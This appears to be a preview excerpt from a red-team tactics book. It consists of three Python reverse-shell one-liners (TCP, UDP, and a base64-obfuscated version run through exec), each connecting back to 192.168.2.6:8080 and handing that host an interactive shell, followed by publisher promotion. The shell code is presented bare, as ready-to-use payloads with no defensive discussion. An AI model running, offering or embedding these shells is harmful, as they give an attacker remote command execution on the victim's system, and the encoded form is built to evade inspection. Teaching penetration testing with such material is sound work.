Python reverse shell

  • TCP-based Python reverse shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.6",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 
  • UDP-based Python reverse shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect(("192.168.2.6",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 
  • Base64 encoded:
python -c "exec('aW1wb3J0IHNvY2tldCAgICAsc3VicHJvY2VzcyAgICAsb3MgICAgIDtob3N0PSIxOTIuMTY4LjIuNiIgICAgIDtwb3J0PTgwODAgICAgIDtzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgLHNvY2tldC5TT0NLX1NUUkVBTSkgICAgIDtzLmNvbm5lY3QoKGhvc3QgICAgLHBvcnQpKSAgICAgO29zLmR1cDIocy5maWxlbm8oKSAgICAsMCkgICAgIDtvcy5kdXAyKHMuZmlsZW5vKCkgICAgLDEpICAgICA7b3MuZHVwMihzLmZpbGVubygpICAgICwyKSAgICAgO3A9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))" ...

Get Hands-On Red Team Tactics now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.